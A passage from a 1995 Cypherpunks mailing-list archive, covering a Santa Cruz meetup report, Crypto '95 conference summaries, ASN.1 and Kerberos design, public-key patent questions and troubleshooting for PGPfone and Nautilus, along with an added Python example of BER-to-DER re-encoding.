Message-ID: <ac6dea8c0a0210047b3a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I want to update the general list on how well our "Cypherpunks Santa Cruz"
party/meeting went last Saturday.

Apologies to those who get this twice, as I just sent it out to the folks
on the mailing list of interested folks I keep. (Not all of them are
readers of this list, so....)

It was a great success, from all indications, and we'll be doing it on a
regular basis. "Meet locally, communicate globally."

--Tim


>Date: Sat, 2 Sep 1995 11:03:33 -0700
>X-Sender: tcmay@mail.got.net
>Mime-Version: 1.0
>To: (Recipient list suppressed)
>From: tcmay@got.net (Timothy C. May)
>Subject: Cypherpunks Santa Cruz -- Great Party!
>
>
>This is a report on the Cypherpunks Santa Cruz party/meeting held last
>Saturday at my house. For those of you on this list (52 at last count,
>obviously not all locals) who missed it, it was considered by many who
>commented to me to be a great success.
>
>Some highlights:
>
>- I counted 23 attendees, from as far away as Oregon (Greg Broiles) and San
>Luis Obispo (Jeff Simmons), and with a bunch of folks from Marin and the
>Greater Bay Area.
>
>- We got rolling around 5, when the first cars started filling up my
>parking area. Things kept going 'til 5 in the morning (!), when the last
>stragglers departed and those staying the night found their futons and
>crashed.
>
>- Not too much was formally done. We had a round of introductions (and I
>provided name tags, which were purely voluntary, in that anyone could
>volunteer not to wear them and hence not be remembered by others...most
>wore them). Later, after the barbecue, Bob Fleming and Cherie Kushner
>described their work on micropower, ultrawideband radio "localizers." While
>not strictly "crypto" related, there are overlapping themes (privacy,
>surveillance, and even some of the math overlaps).
>
>- Mostly it was a chance for our local community of folks interested in
>these issues to mingle and make contact. I expect we may have a larger
>focus than just "crypto" (although Cypherpunks have always had a larger
>focus than just cryptography, of course). Especially as there are folks
>doing some neat stuff on the Web out here in Santa Cruz.
>
>- Two folks from my local ISP attended (Jay and Marc), and they have some
>thoughts on possibly hosting the Cypherpunks archive site on their system,
>and other ideas. They stayed until nearly 5 a.m., talking with us about
>networking, Web pages, etc.
>
>(Santa Cruz has long been a hotbed of computer activity, especially of the
>more independent sort. So the good turnout from local folks could be very
>promising for Cypherpunks themes. Interestingly, Linus Torvaldis (sp?), of
>Linux fame, had just been in town a couple of days before.)
>
>I want to avoid opening the meeting up too broadly, to, for example "anyone
>interested in computers," as this would produce unpredictable turnouts and
>lots of folks who want to learn to use Windows, or need help in dBase, etc.
>Better to keep an ostensible focus on "Cypherpunks" themes, with forays
>into related areas.
>
>Some people commented to me that they hope the meetings/parties are
>monthly, but I suspect every other month may be more reasonable...after
>all, a monthly meeting would mean another one only 3 weeks from today, and
>I can't see this happening.
>
>Anyway, I expect to announce another one for sometime in October. I also
>may be having a "PenSFA" party at my place in early November (11/11 is
>being considered), and may merge the two. It's a good opportunity for
>mingling.
>
>Another attendee offered the possibility of having a Cypherpunks Santa Cruz
>meeting/party at her house, so some rotation to other venues may start to
>happen. I think the notion of having these things at private houses is
>better than trying to get space at a local company, for example. Parties in
>houses are more intimate, less formal, and don't require the "corporate
>approvals" that are sometimes needed. Besides, I'm offering my house and
>have no contacts at local companies.
>
>I expect to be able to host a lot of these things, and if some others
>volunteer as well, we'll be set. (I expect attendance will not equal the 23
>at this "first" meeting, for obvious reasons. This means meetings/parties
>could even be held in apartments or condos. But I'm not suggesting this,
>only noting it.)
>
>So, thanks for coming!
>
>--Tim May
>

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 3 Sep 95 00:34:34 PDT
To: cypherpunks@toad.com
Subject: ASN.1 and Kerberos version 5
Message-ID: <ac6e483800021004fa65@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
>I've heard people associated with the decision to use ASN.1 in
>Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight
>which should be exterminated from the planet.

I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos
version 5. I had this disease at the time that made me think that ASN.1 was
a good idea. I got better, unfortunately we have been living with the
results of my braino for quite some time now... poor Ted.

However, the problem with ASN.1 isn't its waste of space (which actually
isn't that bad for a mechanism for encoding arbitrary objects). The problem
is that it is the product of a standards making process that didn't (and
doesn't) value interoperability. Adherence to the ISO specifications does
not guarantee interoperation. Instead regional "workshops" negotiate
aspects of implementations to obtain interoperation.

What does this mean for ASN.1? It means that the definition of ASN.1 is a
bit abstract (as its name implies). Problems result when two organizations
(say MIT and OSF!) attempt to implement from the specification in ASN.1 but
use different ASN.1 compilers and things then don't work. Arguments then
ensue about whose compiler (or manually written parsing code) is "correct"
in terms of doing the right thing with ASN.1. This is particularly so when
using DER (for Distinguished Encoding Rules) which is itself an
after-thought added to ASN.1 later in the process. It is required in order
to verify digital signatures (which have to be computed on the "encoded"
form of an object because there is no good way to calculate a signature on
an "abstract" object).

If the Kerberos specification said: "put this byte here and that one there"
none of these arguments and problems would happen.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEiaf8UtR20Nv5BtAQFzNAP/Q/LuIMbxAPAp64Kn2PSPd600TYlRAUJh
QbsuL/iRhGXWrxSjsFzkcr6e3sIpSFggxglFU38TJT/DG2AD8MOid3Uj4pRJVbyo
z7Au0Vp1NiotmRBHq2udItzJ7LLPM0j38FHQenqPs9mkX2Cq5kVgGUBO94HabEuE
S9XPCgV8E1Q=
=kTyw
-----END PGP SIGNATURE-----
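
Added example (not part of the message above, and not Kerberos or MIT code): a minimal Python sketch of the point about DER and signatures. Two constructed BER encodings of the same SEQUENCE { INTEGER 5, BOOLEAN TRUE } hash differently, so a signature computed over one cannot verify against the other until both are re-encoded canonically. The function names, the sample bytes, and the bare SHA-256 digest standing in for the signed hash are assumptions of this example; only INTEGER, BOOLEAN and SEQUENCE with definite lengths are handled.

```python
import hashlib


def read_tlv(buf, pos=0):
    """Parse one definite-length BER element; return (tag, contents, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    if tag & 0x1F == 0x1F:
        raise ValueError("multi-byte tags are outside this example")
    pos += 2
    if first < 0x80:                       # short form: the byte is the length
        length = first
    elif first == 0x80:
        raise ValueError("indefinite length is outside this example")
    else:                                  # long form: next n bytes hold the length
        n = first & 0x7F
        if pos + n > len(buf):
            raise ValueError("truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated contents")
    return tag, buf[pos:end], end


def abstract(tag, contents):
    """Return the abstract value of an element, independent of how it was encoded."""
    if tag == 0x30:                        # SEQUENCE: decode each child in order
        items, pos = [], 0
        while pos < len(contents):
            t, v, pos = read_tlv(contents, pos)
            items.append(abstract(t, v))
        return items
    if tag == 0x02:                        # INTEGER: two's complement, big-endian
        return int.from_bytes(contents, "big", signed=True)
    if tag == 0x01:                        # BOOLEAN: BER accepts any non-zero as TRUE
        if len(contents) != 1:
            raise ValueError("BOOLEAN must be one octet")
        return contents[0] != 0
    raise ValueError(f"tag 0x{tag:02x} is outside this example")


def parse(buf):
    """Decode a buffer holding exactly one element."""
    tag, contents, end = read_tlv(buf)
    if end != len(buf):
        raise ValueError("trailing bytes after element")
    return abstract(tag, contents)


def der_length(n):
    """DER length octets: short form below 128, else minimal long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_encode(value):
    """Encode an abstract value the one way DER permits."""
    if isinstance(value, bool):            # bool first: bool is a subclass of int
        tag, body = 0x01, (b"\xff" if value else b"\x00")
    elif isinstance(value, int):
        magnitude = value if value >= 0 else ~value
        size = (magnitude.bit_length() + 8) // 8   # leaves room for the sign bit
        tag, body = 0x02, value.to_bytes(size, "big", signed=True)
    elif isinstance(value, list):
        tag, body = 0x30, b"".join(der_encode(v) for v in value)
    else:
        raise TypeError("unsupported abstract value")
    return bytes([tag]) + der_length(len(body)) + body


def to_der(buf):
    """Re-encode any accepted BER input canonically."""
    return der_encode(parse(buf))


def digest(buf):
    """Stand-in for the hash a signature would be computed over."""
    return hashlib.sha256(buf).hexdigest()


# Constructed sample encodings of SEQUENCE { INTEGER 5, BOOLEAN TRUE }.
BER_A = bytes.fromhex("30 81 07 02 81 01 05 01 01 01")   # long-form lengths, TRUE = 0x01
BER_B = bytes.fromhex("30 08 02 01 05 01 82 00 01 80")   # padded length, TRUE = 0x80
DER = bytes.fromhex("30 06 02 01 05 01 01 ff")           # the single DER encoding

if __name__ == "__main__":
    for name, enc in (("BER_A", BER_A), ("BER_B", BER_B), ("DER", DER)):
        print(name, enc.hex(), parse(enc), digest(enc)[:16], to_der(enc).hex())
```

A verifier that hashes the bytes it received, rather than a canonical re-encoding, will reject a validly signed object that some intermediate implementation re-serialized differently.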






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sun, 3 Sep 95 00:34:28 PDT
To: cypherpunks@toad.com
Subject: Basic Public key algorithms.
Message-ID: <9509021801.AA07301@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



After doing quite a bit of poking around, I am somewhat discouraged
in my attempts to find a simple *pure* public key encryption method,
without a lot of other stuff wrapped around it. 

What I need is to encrypt between 45 and 55 bits of information
using a public key algorithm in an embedded environment. 
Memory usage needs to be minimal (a couple of K), and CPU usage 
will be traded off based on key length.  Decryption speed/memory 
usage is not very limited (done on a workstation, not on embedded
system).

I could use RSA (which is well described in many sources, and has
RSAREF out there),  but I want to avoid the patent issue if possible.  
The sci.crypt FAQ mentions that there are other methods but that 
is about all it says.  Are there any that are not patented?  Are there
any that someone knows of that work well in a limited memory
environment? 

Thanks for any/all pointers.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sat, 2 Sep 95 12:13:39 PDT
To: cypherpunks@toad.com
Subject: Cyphernomicon for ftp
Message-ID: <199509021911.MAA15754@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


I remember the trouble I had finding a text copy of the Cyphernomicon ...

So until someone posts it on a site with higher bandwidth, it's available
at:

ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz  or  cypherfq.zip

We're talking 400K+ over a 28.8 modem, so don't expect much in the way
of speed ...

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 00:34:32 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Basic Public key algorithms.
In-Reply-To: <9509021801.AA07301@spirit.aud.alcatel.com>
Message-ID: <199509021813.OAA29335@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Daniel R. Oelke writes:
> I could use RSA (which is well described in many sources, and has
> RSAREF out there),  but I want to avoid the patent issue if possible.  
> The sci.crypt FAQ mentions that there are other methods but that 
> is about all it says.  Are there any that are not patented?

No, because one patent covers public key cryptography itself, and not
a particular method.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sun, 3 Sep 95 00:34:22 PDT
To: cypherpunks@toad.com
Subject: Dumb Question: PGPfone over Appletalk
Message-ID: <Pine.3.89.9509021905.A22342-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Can someone tell me how to run PGPfone over Appletalk ? The
documentation says that support has been added for this release, and
there's a preferences box to check to use it, but there's no information
I can find in the documentation on how to initiate a call over
Appletalk.. it just says to enter a telephone number to dial. If I 
press 'Connect' without entering anything it hangs up the Mac.

How do I tell it which machine I want to connect to ? 

	Mark "Don't know much about Macs" Grant






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sat, 2 Sep 95 11:18:31 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <WmJSwkkAsSnN084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 02 Sep 1995, "Perry E. Metzger" <perry@piermont.com> wrote:
> Alan Westrope writes:
> >   Michael Froomkin wrote:
> >   > PS when does the statute of limitations run out?
> > June '96.  Zimmermann and Dubois appeared on a local talk radio show
> > recently; a friend happened to catch the program, taped it, and played
> > excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

> That's not possible. The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year.  Branko Lankester announced availability of PGP 2.0
> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

Point taken.  Dubois was referring specifically to the current California
grand jury investigation in association with U.S. Customs.  He said that
this grand jury has until June '96 to issue an indictment or...uhhh...get
off the pot.

I suppose Phil could be charged by some other entity with ITAR/DTR
violations relating to the "export" of PGP, and I'm not sure what would
be the date of this putative violation:  the date Phil gave the program
to others, allegedly "knowing" that doing so would result in its export;
or the date PGP actually appeared at overseas sites.  I suspect I'm not
the only one confused by this, considering the convoluted, baroque and
outdated laws involved.  Mebbe somebody oughta ask Sternlight...:-)

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEieZVRRFMq4NZY5AQF8aAP+MoWcVxn5tVTJ2+SM5HTGFEQqwVnOae2L
cNUaiq2gnogX3lNBV4Deou9WOauzde13FO9SRlHsqHw8D9YnQI14JburLwn4HCnf
GdKs48DWzrG7HR4n1u2cmhqdm3TI7/ylyBbK2DhlUS98JOO0Q0m9+E6uSUcy+NNM
Mq8y7jSD8f8=
=K8td
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 3 Sep 95 00:34:37 PDT
To: cypherpunks@toad.com
Subject: Austin Cypherpunks
Message-ID: <199509021825.NAA00547@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

This is of real interest to Austin subscribers only...

It has been over a year since the last real meeting of the Austin
Cypherpunks. I am interested in getting the group back on a regular schedule
and writing code and building hardware. If you share this interest then
please drop me a note at ravage@einstein.ssz.com

I have created a mailing list for the local members and if interested then
send a subscribe austin-cpunks to list@einstein.ssz.com

That is all.

                                            Jim Choate
                                            CyberTects
                                            ravage@einstein.ssz.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 11:44:16 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01510100ac6e4b262274@[198.59.115.117]>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote concerning Cyphernomicon,
>You list a Web site in your sig, so presumably you have the right tools to
>browse the Web. And I listed two Web sites that have the Cyphernomicon.
>
>What am I missing?

Thanks for the advice.  Here are the two missing pieces.

The first is financial, but might be really psychological.  I buy PPP
service locally and it is hard for me to casually browse with the meter
running in the corner of the screen even at less than a penny a minute.
(And any document that mentions David Friedman probably needs study and
that takes more time.)

The second is that even at the wee hours of the morning I kept getting
refusals from www.oberlin.edu and I couldn't get past the table of
contents.  I had hoped to collect these as I browse 'em to avoid delays
(14.4), hiccups and online time in later reading.  (I didn't even try the
large html--I suspect my browsers will gag on it.)

The third of the two reasons is some vague notion of taking it to lunch or
of annotating the file or the hard copy.

In case it wasn't clear--I couldn't get a peep out of netcom.

My plan is to try oberlin again and if that bogs down, try getting the copy
at the location mentioned by Lou Poppler--or any other location mentioned
this weekend.  Or respond to advice on the best times to try netcom.

I apologize for the implicit assumption in my question about alternate
sites that people had your permission to copy the file to their ftp sites
and am pleased that you explicitly gave that blessing in your recent mail.


Thanks,
Dar
(list newbie)



===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 3 Sep 95 01:00:36 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Crypto '95
Message-ID: <199509021859.OAA02093@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Perry asked for an overview of Crypto '95.  I missed the rump
session, so hopefully someone else will write about that.

	The best talks were probably by Ross Anderson (Robustness
Principles for Public Key Protocols) and Adi Shamir (Myths and
Realities of Cryptography).

	Since Anderson's paper is in the proceedings, I won't rehash
it here, but Shamir's talk is not, so I present his 10 commandments of
Commercial Security:

1.  Don't aim for perfect security.
2.  Don't solve the wrong problem.
3.  Don't try to sell security bottom up.
4.  Don't use cryptographic overkill.
5.  Don't make it complicated.
6.  Don't make it expensive.
7.  Don't use a single line of defense.
8.  Don't forget the mystery attack.
        (Know how to regenerate security when you don't know what's
        going wrong.)
9.  Don't trust systems.
10. Don't trust people.

	In other news:

	Richard Schroeppel, Hillarie Orman (and others) presented some
speedups to elliptic curve systems, based on fast calculation of
reciprocals.  The speedup is about a factor of 3.

	There were some interesting analyses of RC5, SAFER-K64.  

	Bruce Dodson and Arjen Lenstra presented some interesting
results running  NFS with four large primes.  From their abstract:
"[factoring with 2 large primes] completion time can quite accurately
be predicted...For NFS such extrapolations seem to be impossible--the
number of useful combinations suddenly `explodes' in an as yet
unpredictable way, that we have not yet been able to understand
completely.  The consequence of this is that NFS factoring is
substantially faster than expected, which implies that factoring is
somewhat easier than we thought."

	Please note that that doesn't mean RSA has been broken, or
that they can factor products of large primes in their heads.  It
means that there are speedups possible, but not enough that anyone
should be worrying about a 1024 bit key.

	The best quote of the conference was doubtless Robert Morris,
Sr, reminding us of the first rule of cryptanalysis, "Don't forget to
look for plaintext."

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 2 Sep 95 13:20:42 PDT
To: cypherpunks@toad.com
Subject: Crypto '95 report
Message-ID: <199509022019.NAA21443@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This was the first year I attended a Crypto conference (although for the
last two years I have "crashed" the evening rump session, where less
formal 5-10 minute presentations are given).  A number of list members
were present and it was good to meet a lot of new people.

I was a bit disappointed that few of the technical sessions were in areas
that I am interested in or that seem to have bearing on CP issues.  I
have read many of the Crypto proceedings and this year the pickings
seemed to be unusually slim.

Richard Schroeppel gave a very clear presentation on an implementation
of elliptic curve cryptography for a Diffie-Hellman-like key exchange.
This is a two-dimensional variation from the regular integers that are
used in most of the number theory based crypto, and has some
advantages.  This new implementation is actually faster than regular DH
for apparently the same security level.  It looks like elliptic curve
crypto is on the threshold of coming into widespread use.  I believe the
patent situation is one of the main reasons.

There were several papers on secret sharing, something we have discussed
here as an alternative to escrow for handling lost keys.  Amir Herzberg
et al had a method for "resharing" a shared secret periodically and
securely, so that if an adversary was stealthily sneaking in and learning
shares occasionally, he would be put back to square one when the secret
resharing phase occurred.  Only the trustees are involved, not the
original secret holder, and the secret does not have to be reconstructed
during the resharing.

Bruce Dodson presented some results on using the Number Field Sieve
factoring algorithm.  Their implementation looks to be the fastest
available now, considerably better than the Quadratic Sieve that was used
for RSA-129.  I believe they estimated 1000 MIPS years would have been
enough for NFS to do RSA-129 compared to the 6000 MIPS years for QS.
They are now going to try another challenge number, RSA-130.  (RSA has
challenge numbers every 10 digits in size (or maybe it was 5): RSA-140,
RSA-150, etc.)

There was one paper on electronic cash, by Okamoto.  His technology is
distinguished by allowing divisibility - you can take a $10 and divide
it into 2 $5's without going back to the bank.  However he has always
had a problem that your various pieces of cash are linkable, although
not traceable to the user who withdrew them.  His new method uses
smaller amounts of data.  I was encouraged to see some progress on the
linkability issue: for the first time (that I have seen) he admits it
as a problem; he now has it so that theoretically the linkability is
only within a single divided piece of cash (so that if you didn't
divide you wouldn't have linkability).  Actually the overheads are too
large for this to be quite true, but it is a step in the right
direction.  He also included elimination of linkability as a future
goal.  Unfortunately his oral presentation was extremely shallow,
mostly describing what electronic cash was.

There was also a paper on "fingerprinting", the encoding of hidden
information into a document so that if the doc is leaked it can be traced
to the leaker.  The talk wasn't very clear but I was able to glean enough
that I now believe that this is possible whereas I didn't before.

I was discouraged to see a whole session on key escrow.  One presenter
described key escrow as a whole new area of cryptography, analogous to
the discovery of public key crypto when all that was known previously was
conventional key.  Now there are three areas.  The academic crypto
community seems to be greeting key escrow enthusiastically as a new
technical challenge.

The rump session had some good stuff, I thought.  Matt Blaze et al had a
paper on "Master Key" cryptosystems, a variation on escrow where the
government can read all the messages using a certain cryptosystem.  They
pointed out the similarity to the trap door concept used in public key
cryptography and concluded that an efficient master key system would be
an efficient public key system.  If you believe that the latter can't
exist then it follows that the master key versions can't exist either.

Bruce Schneier gave a talk summarizing the sketchy information known
about Skipjack (the cipher in Clipper), including some FOIA'd docs.
These included some comments from design reviews by Mykotronx on
earlier versions, which included references to F and G boxes or
tables.  This is the first I had heard of this and helps explain why
people thought S-1 was Skipjack or a hoax, since it had F and G
tables.  (I hadn't felt that the number of rounds and key/block sizes
were sufficient coincidence to preclude independent invention.)

A new crypto library was announced from AT&T.  It is written in C and
has a bignum lib (arbitrary size) and the usual crypto suspects,
although I think not RSA presumably due to patent issues.  On a
reasonably modern PC it could do an RSA 1024 bit signature in 900
milliseconds.  Email to lacy@research.att.com with subject CRYPTOLIB to
be informed on when it will be released and how to get it.

Dhem and Quisquater described CASCADE, a smart card system with voice
recognition for ID rather than the PIN usually used.
http://www.dice.ucl.ac.be/~dhem/cascade/.  This talk was hard to
understand due to the language differences.

Eric Hughes, co-founder of the cypherpunks, announced the formation of
Cypherpunk Laboratories, a California non-profit corporation.  It is
intended to be a common resource for people motivated by freely available
strong cryptography tools.  Among other things it will offer scholarships
and prizes to students who create relevant work and papers, consider
establishing an online journal focusing on implementations of crypto, and
work on software development.  One project Eric mentioned was to create a
replacement for PGP.

Ron Rivest proposed probabilistic key escrow, which he described as
"translucent" crypto.  The idea is that with every message you send
there is a Law Enforcement Access Field, but there is only some
probability p that it is readable, and you can't tell if it will be
readable or not.  This way you don't lose as much privacy but criminals
can't take the risk that maybe they'll be unlucky and this particular
message will be readable.

Shamir had an interesting paper on preventing "flooding" attacks.  A
server may check for signatures on incoming messages to reject bogus ones
(only certain sigs are valid) but just doing a signature check may take
too long if it is really being flooded.  Shamir came up with a kind of
signature which can be quickly probabilistically checked, based on a
variation on the Rabin cryptosystem.  You can do almost all the work
using single precision and it should be very fast.  I will write this up
if anyone is interested.

Our own Wei Dai, at 19 the youngest author, has spent his summer
vacation developing with Josh Benaloh at Microsoft an improved modular
reduction algorithm, which unfortunately will be patented (or at least
they will try).  BTW a number of people from Microsoft were in attendance
at Crypto, including other list members.  Obviously this crypto stuff
is considered very important at MS.

One of the more interesting talks I thought was from cypherpunk Doug
Barnes, on "identity agnostic" electronic cash.  This is basically an
idea for creating a Magic-Money-type electronic cash server without
violating Chaum's cash patent.  What you do is to run the server and
publish a spec it will follow.  All the server does is do an RSA
signature on the raw data it receives and decrement the user's account
accordingly.  The user has a choice of doing blinding or not on the
signature.

Chaum's patent covers the blinding, so if the user wants to do that he
should be sure to license the patent or live somewhere it doesn't apply
(or ignore it if he figures he's too small potatoes for them to care
about).  But the server isn't responsible for checking all this.  It just
does RSA sigs, which is prior art as far as Chaum's patent goes.  Users
can blind or not, it doesn't care.  It is "identity agnostic" as Doug
says.

The implication is that with an RSA license you could run this kind of
bank (online cash) and ignore Chaum's patents, while a horde of end users
violate the patents but take safety in numbers and get anonymity.
Lawyers like to go after big targets but the servers aren't violating
anything.

The other things I enjoyed in the conference were the non technical talks
by Bob Morris (senior), retired NSA, and later Adi Shamir.  Morris said,
with what I thought was peculiar emphasis, "never underestimate the
amount of time, money, and effort your opponent will put into breaking
your encryption."  He was supposedly speaking in the context of the
German (and Allied) mistakes during WWII, but I got the impression he was
talking about today, and in fact warning of NSA efforts to spy on people.
He went on to describe the many ways mikes and antennas can be planted or
used - he looks at a telephone and sees a microphone, and the hand cord
is an antenna.  All in all a rather chilling talk from someone who
obviously can't say as much as he would like to.

Shamir had some interesting anecdotes about the invention of RSA.  He
emphasized what amateurs the three of them were, claiming this was
probably an advantage.

Some of the other talks I enjoyed without following all the details were
the cryptanalysis ones.  A lot of systems were broken or weaknesses
found.  Most were not ones I was familiar with but it just emphasizes how
hard it is to really come up with something strong.  All those bozos on
sci.crypt with their "break this" challenges would benefit from seeing
some of these results.

All in all there were several interesting results even if the percentage
seemed smaller than usual.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sun, 3 Sep 95 23:11:39 PDT
To: cypherpunks@toad.com
Subject: RE: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <50697.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> I know of a couple of alternative places. 

I too got tired of Netcom's anon ftp server.
An unaltered, ASCII copy of Tim's CP-FAQ is available as
http://www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
This is a low usage site, so response should be fine.

BTW, there is a page for the DC-area Cypherpunks as
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

And a guide to every US Government WWW page that I could find
(including locations of spook facilities) starting at
http://www.isse.gmu.edu/~pfarrell/government/usgov.html

Other crypto related resources are available starting at
http://www.isse.gmu.edu/~pfarrell/crypto.html


Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Sat, 2 Sep 95 14:38:32 PDT
To: cypherpunks@toad.com
Subject: Nautilus 1.0 under OS/2 Warp?
Message-ID: <199509022131.OAA04066@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone run the Nautilus 1.0 secure telecom software in a DOS box
under OS/2?  When I've tried it, it starts up, audio saying "welcome
to Nautilus" comes out of my speakers, and I'm prompted for a
passphrase.  The problem comes when it tries to connect to the
modem. 

It comes back and says "Remote failed to connect" followed by
"Resetting modem...".  Then the software exits.  It never even takes
the phone line off the hook.  Other DOS comm software works just
fine in a DOS box, so why not Nautilus?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 2 Sep 95 14:07:04 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <Pine.PMDF.3.91.950902170303.541094542B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Sep 1995, Perry E. Metzger cleverly sought to get legal 
advice from me by writing:

> Michael, you are one of our local lawyers. Could you please confirm
> the length of the statute of limitations?
> 
harumphf.  (1) I'm not "local" -- as I plan to argue in my cameo at the 
next Sun User's Group conference "cyberspace is not a jurisdiction" 
[apologies if you meant local == USA];  (2) as it happens, I'm nowhere 
near my law books at the moment, being telnetted from about 1800 miles 
(I'd guess) away....so I'm unable to oblige right now.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 2 Sep 95 17:17:59 PDT
To: mark@unicorn.com
Subject: Re: PGPfone over Appletalk
Message-ID: <199509030016.RAA03752@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Rev. Mark Grant" <mark@unicorn.com>
> Can someone tell me how to run PGPfone over Appletalk ? The
> documentation says that support has been added for this release, and
> there's a preferences box to check to use it, but there's no information
> I can find in the documentation on how to initiate a call over
> Appletalk.. it just says to enter a telephone number to dial. If I 
> press 'Connect' without entering anything it hangs up the Mac.
> 
> How do I tell it which machine I want to connect to ? 

I changed the preferences box setting, but then I exited and restarted
the program so that it came up in "appletalk" mode.  This is probably
the step you are missing.  I did this on two different machines, and
then when I clicked connect it no longer tried to open the modem,
